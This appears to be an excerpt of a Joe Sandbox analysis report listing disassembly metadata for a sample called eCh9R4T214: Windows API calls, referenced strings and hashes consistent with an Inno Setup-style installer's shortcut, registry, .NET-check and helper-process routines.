                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateInstance$FreeString
                                                            • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                            • API String ID: 308859552-3936712486
                                                            • Opcode ID: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                            • Instruction ID: c99fdec92309fd26656a6f7ea9bd91ecf5cc306c054acb75a5569a06f28a4b2e
                                                            • Opcode Fuzzy Hash: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                            • Instruction Fuzzy Hash: 29A13E71A00104AFDB50EFA9C885B9E7BF8EF09706F55406AF804E7252DB38DD48CB69
                                                            APIs
                                                            • 73EA4C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                            • 73EA4C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                            • 73EA6180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                            • 73E9A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                            • 73EA4C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                            • 73E9A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                            • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                            • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                            • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                            • DeleteDC.GDI32(?), ref: 0041B4E9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$Delete$A480A570A6180Stretch
                                                            • String ID:
                                                            • API String ID: 1888863034-0
                                                            • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                            • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                            • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                            • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                            APIs
                                                              • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472F70
                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473077
                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047308D
                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004730B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                            • API String ID: 971782779-3668018701
                                                            • Opcode ID: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                            • Instruction ID: 1ded2309c22d90a9957aabde76cedeacc99048359e90752decbb9b8a0015ab1b
                                                            • Opcode Fuzzy Hash: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                            • Instruction Fuzzy Hash: 8FD12574A00149AFDB01EFA9D581BDDBBF5AF08305F50806AF804B7392D778AE45CB69
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,?,00000000,?,00000000,00454AF9,?,0045AECE,00000003,00000000,00000000,00454B30), ref: 00454979
                                                              • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                            • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 004549FD
                                                            • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 00454A2C
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454897
                                                            • , xrefs: 004548EA
                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548D0
                                                            • RegOpenKeyEx, xrefs: 004548FC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$FormatMessageOpen
                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                            • API String ID: 2812809588-1577016196
                                                            • Opcode ID: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                            • Instruction ID: 44bd6ba1492406805f437c97fe518088f2f8e7c1bef0b67c8a01139b77ca8c69
                                                            • Opcode Fuzzy Hash: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                            • Instruction Fuzzy Hash: C0911471944248ABDB10DFE5D942BDEB7FCEB48309F50406BF900FB282D6789E458B69
                                                            APIs
                                                              • Part of subcall function 004596C8: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459863
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 004598CD
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459934
                                                            Strings
                                                            • v2.0.50727, xrefs: 004598BF
                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004598E7
                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459816
                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459880
                                                            • v4.0.30319, xrefs: 00459855
                                                            • .NET Framework version %s not found, xrefs: 0045996D
                                                            • .NET Framework not found, xrefs: 00459981
                                                            • v1.1.4322, xrefs: 00459926
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Close$Open
                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                            • API String ID: 2976201327-446240816
                                                            • Opcode ID: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
                                                            • Instruction ID: 729b419896cd5506e065475e0ee5015c208a67e93f4f54458093df2d8724af3d
                                                            • Opcode Fuzzy Hash: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
                                                            • Instruction Fuzzy Hash: 0051A030A04145EBCB04DFA9C8A1BEE77B69B59305F54447FA841DB393D63D9E0E8B18
                                                            APIs
                                                            • CloseHandle.KERNEL32(?), ref: 00458DDF
                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458DFB
                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458E09
                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00458E1A
                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E61
                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E7D
                                                            Strings
                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458E47
                                                            • Helper isn't responding; killing it., xrefs: 00458DEB
                                                            • Helper process exited, but failed to get exit code., xrefs: 00458E53
                                                            • Helper process exited., xrefs: 00458E29
                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00458DD1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                            • API String ID: 3355656108-1243109208
                                                            • Opcode ID: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                            • Instruction ID: b06cb4cb11178ece3cea1db1bc2ca69ea432733d5239d7d0987fb8f0d427a68f
                                                            • Opcode Fuzzy Hash: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                            • Instruction Fuzzy Hash: D9216D706047009AD720E679C44275BB6E59F08709F04CC2FB999EB293DF78E8488B2A
                                                            APIs
                                                              • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 0045463B
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 00454777
                                                              • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                            Strings
                                                            • RegCreateKeyEx, xrefs: 004545AF
                                                            • , xrefs: 0045459D
                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454583
                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454553
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                            • API String ID: 2481121983-1280779767
                                                            • Opcode ID: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                            • Instruction ID: a200d9e45076b9aa1c9026ee470310bfc0f5ccdb1a8093a9a555fb12639cba12
                                                            • Opcode Fuzzy Hash: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                            • Instruction Fuzzy Hash: 6C81DE75A00209AFDB00DFD5C941BDFB7F9EB49309F50442AE901FB282D7789A45CB69
                                                            APIs
                                                              • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                              • Part of subcall function 004538A8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049669D
                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004967F1), ref: 004966BE
                                                            • CreateWindowExA.USER32(00000000,STATIC,00496800,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004966E5
                                                            • SetWindowLongA.USER32(?,000000FC,00495E78), ref: 004966F8
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC,00496800), ref: 00496728
                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049679C
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000), ref: 004967A8
                                                              • Part of subcall function 00453D1C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                            • 73EA5CF0.USER32(?,004967CB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC), ref: 004967BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                            • API String ID: 170458502-2312673372
                                                            • Opcode ID: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                            • Instruction ID: 3fac7199250898b77632ea887e905273a0ca2a52c1bf25bf17bddf130f7f486a
                                                            • Opcode Fuzzy Hash: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                            • Instruction Fuzzy Hash: EE413D70A44208AFDF01EFA5DC42F9E7BB8EB09714F61457AF500F7291D6799E008BA8
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E4A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-1003587384
                                                            • Opcode ID: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                            • Instruction ID: 6214d84d9e891aa165dd1588e79579c1e4a82babed7fc21810c195be89e1891e
                                                            • Opcode Fuzzy Hash: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                            • Instruction Fuzzy Hash: 65215230B10219ABCB10EAE7DC45A9E77A8EB04318FA04877A500E7281EB7CDE41CA5C
                                                            APIs
                                                            • GetActiveWindow.USER32 ref: 00462D68
                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
                                                            • GetWindowRect.USER32(?,00000000), ref: 00462DE2
                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462E20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                            • API String ID: 2610873146-3407710046
                                                            • Opcode ID: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                            • Instruction ID: 308e9426e96dcd15a0811dc773674cbbce9379ede84ac64ebea6e7762974983c
                                                            • Opcode Fuzzy Hash: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                            • Instruction Fuzzy Hash: 8421A775701B046FD3019A64DD41F3B3395DB94714F08453AF944EB381E6B9EC018A9A
                                                            APIs
                                                            • GetActiveWindow.USER32 ref: 0042F1A4
                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F21E
                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                            • API String ID: 2610873146-3407710046
                                                            • Opcode ID: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                            • Instruction ID: f96f766bc13e38d455a6b30724ea53c80225cfaaeacd9570d6dca051b777ffc7
                                                            • Opcode Fuzzy Hash: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                            • Instruction Fuzzy Hash: 3221D7797057149BD300D664ED81F3B33A4DB85B14F88457AF944DB381D679EC044BA9
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045915F,?,00000000,004591C2,?,?,02173858,00000000), ref: 00458FDD
                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02173858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 0045903A
                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02173858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 00459047
                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00459093
                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02173858,?,00000000,004590F4,?,00000000), ref: 004590B9
                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02173858,?,00000000,004590F4,?,00000000), ref: 004590C0
                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                            • String ID: CreateEvent$TransactNamedPipe
                                                            • API String ID: 2182916169-3012584893
                                                            • Opcode ID: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                            • Instruction ID: 50fb7c1009465aa7c5405e125e9101384e11cc4d6b330c20a7fc1de2f8ccdd80
                                                            • Opcode Fuzzy Hash: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                            • Instruction Fuzzy Hash: 68417F71A00608EFDB15DF99C985F9EB7F9EB08714F1044AAF904E72D2C6789E44CB28
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CBD,?,?,00000031,?), ref: 00456B80
                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B86
                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BD3
